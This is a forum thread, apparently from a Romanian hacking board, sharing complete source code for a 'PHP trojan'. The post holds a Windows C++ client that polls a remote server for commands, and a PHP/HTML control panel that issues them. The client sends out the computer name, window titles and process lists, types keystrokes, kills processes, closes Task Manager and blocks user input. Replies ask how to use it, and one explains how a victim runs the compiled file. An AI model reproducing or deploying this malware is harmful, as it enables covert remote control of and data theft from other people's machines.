puskin Posted May 4, 2008 Report Posted May 4, 2008 /********************************************************************PHP TROJAN*********************************************************************/#pragma optimize("gsy",on)#include <windows.h>#include <wininet.h>#include <stdio.h>#include <WinAble.h>#include <TlHelp32.h>#pragma comment(lib,"wininet.lib")#pragma comment(lib,"winmm.lib")char pcName[256];char iPcName[256];char plist[256];char cmd[256];char tmp[256];char className[256];char *msg;bool killProc(char*procName);bool mon=FALSE;bool banned;HINTERNET hFile;HINTERNET hBan;HINTERNET hInet;HINTERNET sInet;HWND currentWindow;HWND GetFirstWindowText(char buf[],unsigned int max_out,int *text_written);unsigned long len_ComputerName = MAX_COMPUTERNAME_LENGTH + 1;int x;int times;int GetNextWindowText(char buf[],unsigned int max_out,HWND* handle);DWORD sized;DWORD WINAPI clr(LPVOID u);DWORD WINAPI monitor(LPVOID);void phpCmd(char*prm);void clear();void TypeStr(char*keys) //From [email]Napalm@netcore2k.net[/email](modified a bit so i could understand it){for(int x=0;x<strlen(keys);x++){int virtualKey=VkKeyScan(keys[x]);if((virtualKey>>8)&1) keybd_event(VK_LSHIFT,0,0,0);keybd_event((unsigned char)virtualKey,0,0,0);keybd_event((unsigned char)virtualKey,0,KEYEVENTF_KEYUP,0);if((virtualKey>>8)&1) keybd_event(VK_LSHIFT,0,KEYEVENTF_KEYUP,0);}}int WINAPI WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in_opt LPSTR lpCmdLine, __in int nShowCmd ){CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)monitor, (LPVOID) 0, NULL, NULL);GetComputerName(pcName,&len_ComputerName);hInet = InternetOpen(NULL, 1, NULL, NULL, 0);while(1){memset(cmd,0,256);hFile = InternetOpenUrl(hInet, "http://site/commands.txt", NULL, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0);int ret=InternetReadFile(hFile,cmd,256,&sized);InternetCloseHandle(hFile);if(!_strnicmp(cmd,"msgb",4)){for(x=0;x<=strlen(cmd);x++)if(cmd[x]==' '){MessageBox(NULL,&cmd[x+1],"Hacker says:",MB_OK);break;}}if(!_stricmp(cmd,"wubu")){GetWindowText(GetForegroundWindow(),cmd,256);sprintf(tmp,"send=%s",cmd);phpCmd(tmp);clear();}if(!_stricmp(cmd,"open cd"))mciSendString("set CDAudio door open", NULL, 0, NULL);if(!_stricmp(cmd,"close cd"))mciSendString("set CDAudio door closed", NULL, 0, NULL);if(!_stricmp(cmd,"darken"))mon=TRUE;if(!_stricmp(cmd,"lighten"))mon=FALSE;if(!_stricmp(cmd,"swap mouse buttons"))SwapMouseButton(true);if(!_stricmp(cmd,"restore mouse buttons"))SwapMouseButton(false);if(!_strnicmp(cmd,"cursor position",strlen("mouse position"))){for(x=strlen("cursor position");x<=strlen(cmd);x++)if(cmd[x]==' '){times=atoi(&cmd[x+1]);break;}srand(GetTickCount());for(x=0;x<=times;x++){Sleep(1);SetCursorPos(rand()%GetSystemMetrics(SM_CXSCREEN),rand()%GetSystemMetrics(SM_CYSCREEN));}}if(!_strnicmp(cmd,"setfw",5)){for(x=strlen("setfw");x<=strlen(cmd);x++)if(cmd[x]==' '){ShowWindow(FindWindow(NULL,&cmd[x+1]),true);SetForegroundWindow(FindWindow(NULL,&cmd[x+1]));SetFocus(FindWindow(NULL,&cmd[x+1]));break;}}if(!_stricmp(cmd,"close fw"))SendMessage(GetForegroundWindow(),WM_CLOSE,0,0);if(!_stricmp(cmd,"pcname")){sprintf(tmp,"send=%s",pcName);phpCmd(tmp);}if(!_strnicmp(cmd,"sendString",10)){for(x=10;x<=strlen(cmd);x++)if(cmd[x]==' '){TypeStr(&cmd[x+1]);if(cmd[4]=='S'){TypeStr("\n");}break;}}if(!_strnicmp(cmd,"kill",4)){for(x=4;x<=strlen(cmd);x++)if(cmd[x]==' '){killProc(&cmd[x+1]);break;}}if(!_stricmp(cmd,"plist")){memset(plist,0,256);PROCESSENTRY32 pe32 = {0};HANDLE hSnapshot = NULL;hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if(hSnapshot != (HANDLE) -1){phpCmd("proc=[PSTART]");pe32.dwSize = sizeof(PROCESSENTRY32);int proc_cnt = 0, thrd_cnt = 0;if(Process32First(hSnapshot, &pe32)){do{sprintf(plist,"proc=%s",pe32.szExeFile);phpCmd(plist);Sleep(50);}while(Process32Next(hSnapshot, &pe32));}phpCmd("proc=[PEND]");}}if(!_stricmp(cmd,"wlist")){FILE*f=fopen("list.txt","a");memset(plist,0,256);currentWindow = GetFirstWindowText(tmp, sizeof(tmp), 0);GetClassName(currentWindow,className,256);sprintf(plist,"%s | Class: %s",tmp,className);fputs(plist,f);while(currentWindow){GetNextWindowText(tmp, sizeof(tmp), ¤tWindow);GetClassName(currentWindow,className,256);if(*tmp && IsWindowVisible(currentWindow)){if(strcmp(tmp, "Program Manager")){sprintf(plist,"%s | Class: %s",tmp,className);fputs(plist,f);}}}fclose(f);HINTERNET hFtpSession = InternetConnect(hInet,"site",INTERNET_DEFAULT_FTP_PORT, "user","pass", INTERNET_SERVICE_FTP, 0,0 );FtpPutFile(hFtpSession,"list.txt","site/plist.txt", FTP_TRANSFER_TYPE_BINARY, 0);InternetCloseHandle(hFtpSession);DeleteFile("list.txt");}if(strcmp(cmd,""))clear();Sleep(1000);}InternetCloseHandle(hInet);}void phpCmd(char*prm){CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)&clr,prm,0,NULL);}void clear(){CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)&clr,"cmd=clr",0,NULL);}DWORD WINAPI clr(LPVOID u){int len=strlen("http://site/action.php?")+128;char *com=(char*)malloc(len);sprintf(com,"http://site/action.php?%s",u);HINTERNET hInet2 = InternetOpen(NULL, 1, NULL, NULL, 0);HINTERNET hUrl = InternetOpenUrl(hInet2, com, NULL, 0, INTERNET_FLAG_NO_CACHE_WRITE, 0);InternetCloseHandle(hUrl);InternetCloseHandle(hInet2);free(com);ExitThread(0);}DWORD WINAPI monitor(LPVOID){HWND tmgr;while(1){Sleep(1);tmgr=FindWindow(NULL,"Windows Task Manager");if(tmgr!=NULL)SendMessage(tmgr,WM_CLOSE,0,0);if(mon==TRUE){BlockInput(true);SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);}else{BlockInput(false);SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) -1);}}ExitThread(0);}bool killProc(char *procName){HANDLE hProcessSnap;HANDLE hProcess;PROCESSENTRY32 pe32;DWORD dwPriorityClass;hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if(hProcessSnap == INVALID_HANDLE_VALUE){return(false);}pe32.dwSize = sizeof(PROCESSENTRY32);if(!Process32First(hProcessSnap, &pe32)){CloseHandle(hProcessSnap);return(false);}do{if(!_stricmp(pe32.szExeFile, procName)){hProcess = OpenProcess(PROCESS_TERMINATE,0, pe32.th32ProcessID);if(TerminateProcess(hProcess,0) == ERROR){return false;}else{return true;}CloseHandle(hProcess);}}while(Process32Next(hProcessSnap, &pe32));CloseHandle(hProcessSnap);}HWND GetFirstWindowText(char buf[],unsigned int max_out,int *text_written){//From Uranium && crAckerHWND ret_val;ret_val = GetForegroundWindow();if(!text_written) GetWindowText(ret_val,buf,max_out);else *text_written = GetWindowText(ret_val,buf,max_out);return ret_val;}int GetNextWindowText(char buf[],unsigned int max_out,HWND* handle) //From Uranium && crAcker{*handle = GetNextWindow(*handle,GW_HWNDNEXT);return GetWindowText(*handle,buf,max_out);} WEB FILES:action.php<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>Untitled Document</title></head><body><?phpfunction readIt($path){$file=@fopen($path,"r") or die("File couldn't be open");while(!feof($file))echo fgets($file);fclose($file);}if($_GET["cmd"]=="clr"){$file=fopen("commands.txt","w");fclose($file);}else if(isset($_GET["send"])){$file=fopen("recived.txt","w");fwrite($file,$_GET["send"],strlen($_GET["send"]));fclose($file);}else if(isset($_GET["proc"])){if($_GET["proc"]=="[PSTART]")unlink("plist.txt");else if($_GET["proc"]=="[PEND]");else{$proc=@fopen("plist.txt","a");fputs($proc,$_GET["proc"],strlen($_GET["proc"]));fclose($proc);}}else{if(strlen($_POST["this"])!=0){$file=fopen("commands.txt","w");fwrite($file,$_POST["this"],strlen($_POST["this"]));fclose($file);}if(strlen($_POST["ss"])!=0){$file=fopen("commands.txt","w");fwrite($file,"sendString ".$_POST["ss"],strlen($_POST["ss"])+11);fclose($file);}}include("index.htm");if($_POST["button"]=="read recived"){echo "Recived: ";readIt("recived.txt");}if($_POST["button"]=="read plist"){echo "Processes:";readIt("plist.txt");}if($_POST["button"]=="delete recived")unlink("recived.txt");if($_POST["button"]=="delete plist")unlink("plist.txt");if($_POST["button"]=="read cmd"){echo "Command: ";readIt("commands.txt");}?></body></html>index.htm:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>Trojan</title></head><body><form id="form1" name="form1" method="post" action="action.php">sendString Comm:<input name="ss" type="text" /></p>Trojan commands:<input name="this" type="text" /></p>Client commands:<input name="button" type="text" /><input type="submit" name="Submit" value="Go" /></p></form></body></html>credit: X-N2O Quote
cannabiss6 Posted February 9, 2010 Report Posted February 9, 2010 are ceva daca il incerc pe myself ? Quote
hirosima Posted February 9, 2010 Report Posted February 9, 2010 l-a incercat cineva. presupun ca doar linkul daca este accesat vitima poc e infectata¿ Quote
Krisler12 Posted February 9, 2010 Report Posted February 9, 2010 primul fisier nu e in cpp ? eu asa zic.Deci cum se foloseste chestia asta ? trebuie compilat acel fisier cpp in executabil sau se uraca pe serverul de host asa cum este el?Il testez eu dar numai sa imi spuna cineva cum se foloseste, cum sa fac ?btw, daca acel fisier cpp trebuie compilat atunci sa mi-l compileze cineva ca eu folosesc poate alt compilator si o sa am o caruta de erori.Multam' ! Quote
tdxev Posted February 9, 2010 Report Posted February 9, 2010 Nu am stat sa verific dar din cate vad cred ca lucreaza in felul urmator..primul fisier trebuie coplilat el va fi "trojanServer" pe care il executa victima.. (va trebuie sa modificati prin sursa pe unde gasiti ceva de genu Http://site/. cu linkul catre host-ul unde vor fi urcare cele 2 script-uri)ultimele doua fisiere le urci pe un host.. Servarul va incerca sa se conecteze la host pentru a primi comenzi.. trebuia sa puna si el o constanta la inceputul primului fisier care sa contina adresa host sa nu stai sa cauti prin tot fisierul Quote
